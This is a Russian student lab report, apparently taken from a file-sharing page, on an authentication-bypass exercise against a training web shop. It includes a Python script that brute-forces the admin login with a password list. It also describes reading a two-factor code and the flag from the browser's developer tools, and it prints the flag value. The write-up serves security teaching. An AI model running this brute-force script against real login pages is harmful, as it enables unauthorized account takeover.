Скачиваний:
0
Добавлен:
17.07.2026
Размер:
501 Кб
Скачать

МИНОБРНАУКИ РОССИИ

Санкт-Петербургский государственный

электротехнический университет

«ЛЭТИ» им. В.И. Ульянова (Ленина)

Кафедра информационной безопасности

ПрактическаЯ РАБОТА №1

по дисциплине «Угрозы и уязвимости информационной безопасности компьютерных сетей»

Тема: Authentication bypass.

Студент гр _________________

Преподаватель _________________ Фаткиева Р.Р.

Санкт-Петербург

2026

В самом начале пользователь попадает на страницу некого интернет-магазина (рисунок 1)

Рисунок 1. Стартовый экран

После этого необходимо, согласно полученным знаниям с курса «Белый хакер», перейти на панель админа данного веб ресурса, добавив к ссылке строку «/admin/» (рисунок 2)

Рисунок 2. Вход на панель администратора

Далее, для брутфорса паролей, был написан следующий скрипт:

import requests

url = 'http://web.hcg6gcakmcgsb6oxosrg.labs.cyber-ed.space/admin/'

password_file = 'passwords.txt'

with open(password_file, 'r') as file:

passwords = file.readlines()

i=0

for password in passwords:

password = password.strip()

data = {'username': 'admin', 'password': password}

response = requests.post(url, data=data)

if 'Wrong username' not in response.text and 'Login' not in response.text:

print(f"Успешный вход с паролем: {password}")

break

else:

print(f"{i} wrong")

i+=1

Рисунок 3. Результат работы программы

Далее, попав, на страницу двухфакторной аутентификации, зайдя в панель разработчика (F12) можно увидеть трехзначное число, которое необходимо ввести. (рисунок 4)

Рисунок 4. Двухфакторная аутентификация

После этого можно будет, в этой же панели разработчика, увидеть искомый флаг. (рисунок 5)

Рисунок 5. Флаг найден

Искомый флаг: 637302a3ed963d2772a9bf26c6c89a36

Рисунок 6. Успех

Список использованных источников

  1. Информация с сайта. URL: https://labs.cyber-ed.ru/group/38/task/26/ (дата обращения 12.03.2026)

  2. Информация с сайта. URL: https://stepik.org/lesson/1104693/ (дата обращения 12.03.2026)

Соседние файлы в предмете Угрозы и уязвимости информационной безопасности компьютерных сетей